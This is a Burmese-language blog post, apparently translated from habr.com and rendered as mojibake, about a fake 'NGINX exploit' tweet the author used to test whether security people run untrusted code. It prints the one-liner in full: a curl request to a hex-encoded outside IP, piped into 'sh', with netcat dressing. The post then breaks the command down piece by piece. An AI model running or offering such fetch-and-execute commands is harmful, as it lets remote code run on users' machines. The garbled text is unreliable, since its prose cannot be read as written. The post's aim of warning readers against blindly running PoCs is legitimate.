ááŸááºáá»ááºá áá¬áá¬ááŒááº:
TL;DR- áááºááá·áºá¡ááŒá±á¡áá±áá»áá¯ážááœááºáááᯠsh ááá¯á·ááá¯áẠbash ááœáẠááá¯ááºááá¯ááºááá¯ááºážááᯠááá¯á¶ážáá«ááŸáá·áºá á€áááºááŸá¬ ááá·áºááœááºááŒá°áá¬ááᯠááááºážáá»á¯ááºááŸá¯ áá¯á¶ážááŸá¯á¶ážááẠáááºážáááºážáá±á¬ááºážáá
áºáá¯ááŒá
áºáááºá
áá±á 31 áááºááŸá¬ áááºáá®ážáá²á·áá²á· áá¯ááºáጠPoC exploit á¡ááŒá±á¬ááºáž á¡ááá¯áá»á¯á¶ážááŒá®áž áá»áŸáá±áá»ááºáá«áááºá ááááºážááᯠáá¯á¶á·ááŒááºáá²á·á¡áá±áá²á· áá»ááºááŒááºážáá±á«áºáá¬áááºá
curl ááœáẠobfuscation áááºážááá¬á¡áá áºáá áºáá¯á¡á¬áž áá¯ááºáá±á¬ááºááŒá®ážáá±á¬á¡áá«á áá»áœááºá¯ááºááẠáá°áááºáž tweet ááá¯ááá¯ážáá¬ážááŒá®áž ááŸá¬ááœá±ááœá±á·ááŸááá¬ážááá·áºá¡á¬ážáááºážáá»ááºááᯠá¡áá¯á¶ážáá»áááºáᯠáá°áááá±á¬ áá¯ááºááá¯ááºážáá áºáá¯áá«ááŸááá±á¬ "á¡áá¯ááºáá¯ááºáá±á¬ PoC" ááᯠáá±á«ááºááŒá¬ážáá²á·áááºá áá¯ááºáá«áááºá áá«á áá¯á¶ážáááᯠá¡áááá¹áá«ááºáááŸááá°ážá áá«áá»ááºáá»ááºážáá±á¬áºáá¯ááºáá¶ááááá·áºáááºáááºáááºá á¡áá±á¬ááºážáá¯á¶ážááá±á¬á· retweet ááŸá áºáá¯ááááá·áºááẠ(á¡áá¯áž áá±á¬ááºážááŒá®)á
áá«áá±ááá·áº áá±á¬ááºáá¬ááœá±áááºááŒá áºááá²ááá¯áá¬áá±á¬á· ááœá±ážááŒáá·áºááá¯á· áááá°ážá áá»áœááºá¯ááºá tweet ááá±áááºážá á¬ážááŸá¯ááẠááá¯ááºááá¯ážáááºáá¬áááºá á¡á¶á·ááŒá áá¬áá±á¬ááºážáá¬áá áá±á¬áá±á¬ááẠ(15:00 áá±á¬áºá ááá¯á á¶áá±á¬áºáá»ááẠááœááºá 1 áááº) ááŸá¬ áá°á¡áááºážáááºá áá«áᬠá¡áá¯ááŒá áºááŒá±á¬ááºáž ááá±á¬áá±á«ááºááœá¬ážáá«ááŒá®á áá°á¡áá±á¬áºáá»á¬ážáá»á¬ážá áááºážááᯠáá¯á¶ážááá á áºáá±ážáá² ááŒááºáááºááŒááẠ(áááºážááœááºááŸááá¬ážáá±á¬ áá»á áºá áá¬áá±á¬ááºážáá±á¬ ASCII ááááºáá áºááᯠááá±á¬áá»áá±áá±áá¬áá¬)á
ááŒáá·áºááá¯ááºáá¯á¶áá²á· áááºáá±á¬ááºááŸáá²!
á€á¡ááœááºáá»á¬ážááŸáá·áº á¡áá±á¬ááºáá»á¬ážá¡á¬ážáá¯á¶ážááẠáá±á¬ááºážááœááºáá±á¬áºáááºážá áá°áá»á¬ážááẠáááºážááá¯á·ááá¯ááŒááºááẠáááºážááá¯á·áá ááºááœáẠáá¯ááºááᯠrun ááááºááŸá¬ áááºááŸá¬ážáá«áááºá áá¶áá±á¬ááºážá áœá¬ááŒáá·áºá ááá±á¬ááºáá¬áá»á¬ážááẠááá¯áááºážá¡ááá¯ááºážá¡áá¯ááºáá¯ááºááŒá®áž áá»áœááºá¯ááºááẠááá¬ážá¥ááá±á¡á ááŒá¿áá¬ááááºá á±ááá¯ááá·áºá¡áá»ááºááŸáá·áº áá±á«ááºážá ááºáá¬á áá»áœááºá¯ááºáááá¯ááºááœáẠááŒáŸá¯ááºááŸá¶áá¬ážáá±á¬áá¯ááºááẠáá±á¬ááºáááºáá¯ááºááᯠááá·áºááœááºážááẠááá¯á·ááá¯áẠáá¯ááºáá±á¬ááºááẠáááŒáá¯ážá á¬ážáá² áá²á·áááºáá¶áá±á«áºááá¯ááŸá¯áá»á¬áž ááŒá¯áá¯ááºáá±ááŒááºážááŒá áºáááºá
áá±ážáááºáá±á¬ ááœá²ááŒá¬ážááŸá¯-
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
áá°ááŸá¯-á¡á®áááºáááœááºážáá áºá¡ááºáá»ááºáá®áᬠ(SEE) - ááŒá¬ážáá±á¬ááºážááŒááºážáááºáááºááẠááá¯áááºá
áá±ážáááºážááŸá¯ááŸáá·áº áááºážááŸá®ážáá»áœááºážáááºááŸá¯ááẠá€á ááºážáááºááŸá¯á á¡áááá¡á áááºá¡ááá¯ááºážáá áºáá¯ááŒá áºáááºá á¡á²áá«ááœá±á áá°á·áá²á·á¡á±á¬ááºááŒááºááŸá¯ááᯠááŒá áºáá±á«áºá á±áááºááá¯á· áá»áœááºáá±á¬áºáááºáá«áááºá á¡áááá·áºáá±ážá á¬ááŒá±á¬ááºážááẠ"127.0.0.1" (áá°áááá»á¬ážáá±á¬ localhost) ááá¯áááºááœáŸááºážááŒááºážááŒáá·áº áá¯á¶ááŒá¯á¶áá±ážááᯠááŸááºážááŸááºážáááºážáááºážáá±á¬áºááŒáá«áááºá Localhost ááẠáá¯á¶ááŒá¯á¶áááºáᯠáá°áááŒá®áž áááºážáá±á«áºááŸá áá±áá¬ááẠááá·áºááœááºááŒá°áá¬ááᯠáááºáá±á¬á·á០ááá¬ážáá²á·áá«á
áááºážááŸá®ážááŸá¯ááẠá ááºážáááºááŸá¯á áá¯áááá¡ááááá±á¬á·áá»áẠSEE á¡á áááºá¡ááá¯ááºážááŒá áºáááºá áá áºááŸááºááááááºááẠá¡áááá¡á¬ážááŒáá·áº ááœááºáá»á°áá¬áá¯á¶ááŒá¯á¶áá±ážá á¡ááŒá±áá¶áá»á¬ážááŸáá·áº áááºážááŸá®ážáá°áá»á¬ážááŒá áºáá±á¬ááŒá±á¬áá·áºá áááºážá¡á áááºá¡ááá¯ááºážáá»á¬ážááᯠáááºážááŸá®ážááŒá®áž áááºážááŸá®ážáá¯á¶áá±á«ááºá á±áááºá¡ááœáẠáá¯ááºáááºáá®ážááẠá¡áá±ážááŒá®ážáá«áááºá á¡áá¯á¶ážáá»ááŸá¯ á¡áá°á¡ááá±á¬ááºážáá»á¬ážá á¡á áááºá¡ááá¯ááºážáá»á¬ážááᯠááŸá¬ážáááºážááŒá®áž áá¯á¶ááŸááºááá¯ááºáá±á¬ áááºážáááºážááŒáá·áº áá±á«ááºážá ááºááŒááºážááẠá¡ááœááºá¡á±á¬ááºááŒááºááŒá±á¬ááºáž áááºáá±ááŒáá«áááºá
á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááºááŸá¬ one-liner áá¡áá±ážá áááºááœá²ááŒááºážá áááºááŒá¬áá»ááºááŒá áºáááºá á€á á¬áááºážááœááºáá«áá±á¬ á¡áá¬á¡á¬ážáá¯á¶ážááẠá¡áá»á¯á¶ážáááºáááºá á¡ááŸáá¯ááºááá¬áá áááºááœá±á·á¡á¬ážááŒáá·áº áááºážá áááºááœá±á·áá¯ááºáá±á¬ááºááŸá¯á¡ááœáẠáááºááá·áºá¡áá¬áá»áŸ áááá¯á¡ááºáá«á
ááááºááá¯á¡ááºáá²á· á¡á
áááºá¡ááá¯ááºážááœá±á áá¬ááœá±áá²á áá® -gsS
, -O 0x0238f06a
, |sh
ááŸáá·áº web server ááá¯ááºááá¯ááºá áááºáá¬áá¬ááœáẠá¡áá¹ááá¬ááºááŸááá±á¬ ááœáŸááºááŒá¬ážáá»ááºáá»á¬áž ááá«áááºáá±á¬áºáááºáž ASCII ááááºáá
áºáá»á¬ážááᯠá¡áááá·áºáá±ážáá»ááºáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á ááá¯ážááá¯ážááŸááºážááŸááºáž áá¯ááºáá±á¬ááºáá²á·áááºá echo
áá¬ááºááœáŸááºážááœááºáá«ááŸááááºá index.html
. á¡áá¯á¶ážááŒá¯áá°ááẠááá¯ááºážáá
áºáá¯ááŸáá·áº áááºáá¬áá±á¬á¡áá« |sh
á¡áááºááœááº, index.html
áááºááŒá®áž ááœááºáá»ááºáááºá áá¶áá±á¬ááºážáá±á¬ááºáá
áœá¬á áááºáá¬áá¬áááááºážááááºážáá°áá»á¬ážááẠááá±á¬ááºážáá±á¬áááºááœááºáá»ááºáááŸááá²á·áá«á
-
../../../%00
- áááºážááœáŸááºááá¯áá»á±á¬áºááœááºááœá¬ážááŒááºážááá¯ááá¯ááºá á¬ážááŒá¯áááºá -
ngx_stream_module.so
- áá»áááºáž NGINX áá±á¬áºáá»á°ážáá®ááá¯á· áááºážááŒá±á¬ááºážá -
/bin/sh%00<'protocol:TCP'
- áá»áœááºá¯ááºááá¯á· á áááºáá¯ááºáá±á¬ááºáá±áá«áááºá/bin/sh
áá áºááŸááºá ááºáá±á«áºááœáẠá¡ááœááºááᯠTCP áá»ááºáááºááá¯á· ááŒááºááœáŸááºážáá«á -
-O 0x0238f06a#PLToffset
- áá»áŸáá¯á·ááŸááºáá«áááºáá á¹á ááºážá ááŒáá·áºá áœááº#PLToffset
PLT ááœááºáá«ááŸááá±á¬ Memory offset ááŸáá·áºáá°á á±áááºá -
|sh;
- áá±á¬ááºáááºá¡áá±ážááŒá®ážáá±á¬á¡ááá¯ááºážá áá»áœááºá¯ááºááá¯á·ááẠááá¯ááºááá¯ááºáá±áá±á¬ áááºáá¬áá¬ááŸáá¬áá±á¬ áá¯ááºááᯠáá¯ááºáá±á¬ááºáááºá¡ááœáẠá¡ááœááºááᯠsh/bash ááá¯á· ááŒááºááœáŸááºážááẠááá¯á¡ááºáá«áááºá0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- netcat ááá¯áááºááœáŸááºážáá±á¬ dummy/dev/tcp/localhost
áá«á០á¡áá¬á¡á¬ážáá¯á¶ážááᯠááŒááºááŒá®áž áá¯á¶ááŒá¯á¶á á±ááŸá¬áá«á ááááºáá±á¬á· áá«áᬠáá¬ááŸááá¯ááºáá² á¡ááŸá¡áá¡ááœáẠááá¯ááºážáá²ááŸá¬áá«áááºáá«áááºá
áááºážááẠáá áºááŒá±á¬ááºážáááºážáá±á¬ áá¬ááºááœáŸááºážááᯠáá¯ááºááœá²ááŒááºážááŸáá·áº "áá°ááŸá¯-á¡á®áááºáááœááºážáá Ạá¡ááºáá»ááºáá®áá¬" (ááŸá¯ááºááœá±ážáá±á¬ ááŒá¬ážáá±á¬ááºážááŒááºáž) á ááŸá¯áá±á¬áá·áºáá»á¬ážá¡ááŒá±á¬ááºáž ááœá±ážááœá±ážááŸá¯ááᯠáááá¯á¶ážáá»á¯ááºáááºá
áááºáá¬áá¬ááœá²á·á ááºážáá¯á¶ááŸáá·áº áááºááŒááºáá±á¬ááºááœááºááŸá¯áá»á¬áž
áá»áœááºá¯ááºáá á¬áááºážááœááºážáá°á¡áá»á¬ážá á¯ááẠinfosec/hackers áá»á¬ážááŒá áºáá±á¬ááŒá±á¬áá·áºá áá»áœááºá¯ááºááẠáááºážááá¯á·áááºá០âá áááºáááºá á¬ážááŸá¯â áá°áá±á¬áá±á¬áºááŒáá»ááºáá»á¬ážááᯠá¡áááºážáááºáá¶ááá¯ááºáááºááŸáá á±áááºá áááºáá±á¬ááºáááº)á á ááºážáááºááŸá¯ áááºáááºáá¯ááºáá±á¬ááºáá±áá±ážáááŒáá·áº á€áá±áá¬á áá»áá±á¬ááºáá±áá±á¬ áá»áá¯á·ááœááºážáá»ááºá¡á¬ážáá¯á¶ážááᯠáá»áœááºá¯ááºá á¬áááºážááœáẠááá±á¬áºááŒáá±á¬á·áá² á€á¡áá¬áá»á¬ážááẠáá¬áá¬á០áá¯ááºáá±á¬ááºááá·áº á¡áá¬á¡áá»áá¯á·ááŒá áºáááº-
- á¡áá»áá¯á·áá±á¬ áá°ááŸá¯ááœááºáááºáá»á¬ážááœáẠááŒáá·áºááŒá°ážááŸá¯ ááŒáá¯ážáááºážááŸá¯áá»á¬ážááᯠáááºááŒáœá áœá¬ á á±á¬áá·áºááŒáá·áºá á áºáá±ážááŒá®áž ááá·áºááºááᯠááŸáááºááẠáá¯á¶ážá áœá²áá°á¡á¬áž á¡á¬ážáá±ážáááºá¡ááœáẠá¡áá»áá¯ážáá»áá¯ážáá±á¬ á¡ááŒáá¯ááŒáá·áºááŸá¯ááŸá¯ áá¯á¶áá±ážáá»á¬ážááᯠá¡á á¬ážááá¯ážáááºá
- Shell script ááá¯ááŒáááá·áºá¡á á¬áž Thugcrowd áááá¯ááá¯ážááŸááºážáá®áá®ááá¯ááá¯á· Chrome/Mozilla/Safari/etc ááᯠááŒááºááœáŸááºážáááºá
- áá»á°ážáá»á±á¬áºáááºáá±á¬ááºááŒááºáž/ ááŒá±á¬ááºááŒá±á¬ááºáááºážáááºáž áááºáá¬áá»á¬ážá áááá¬áááºááŸá¬ážáá±á¬ ááá¹ááá¬áá»á¬ážááᯠá á±á¬áá·áºááŒáá·áºááŒá®ážáá±á¬áẠNSA áá¬áá¬áá»á¬ážááá¯á· áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠááŒááºááœáŸááºážááŒááºáž á áááºááẠ(á!)á
- áá¯á¶ááŸááºááá±á¬ááºáá¬á០á¡áá¯á¶ážááŒá¯áá°áá»á¬ážááẠáá¯á¶ááŸááºááá±á¬ááºáá¬á០host ááá¯á·áá¬áá±á¬ááºáááºáááºáá±á¬ ááœááºáá»á°áá¬áá»á¬ážá¡á¬ážáá¯á¶ážááœáẠTrojan ááŸáá·áº BIOS rootkit áá áºáá¯ááá¯á·ááᯠááá·áºááœááºážáá±ážááẠ(áá±á¬ááºáá¬áá«)á
Antimers ááá±ážáááºáá±á¬á¡á
áááºá¡ááá¯ááºáž
á€ááá á¹á ááœááºá áá»áœááºá¯ááºááá áºáá¯áááºážáá±á¬áááºááŸááºážáá»ááºááŸá¬ Apache áá¡ááºá¹áá«áááºá¡áá»áá¯á·ááá¯áá»áœááºážáá»ááºáááºááŒá áºááẠ- á¡áá°ážáááŒáá·áºá áá±á¬ááºážááá¯áá»ááºáá»á¬ážááá¯ááŒááºáááºááœáŸááºážááŒááºážá¡ááœááºá¡á±ážááŒáá±á¬á ááºážáá»ááºážáá»á¬áž - á¡áááºááŒá±á¬áá·áºáááºážá
NGINX Exploit (Real!)
á
á¬áááºážááœááºážáá«
source: www.habr.com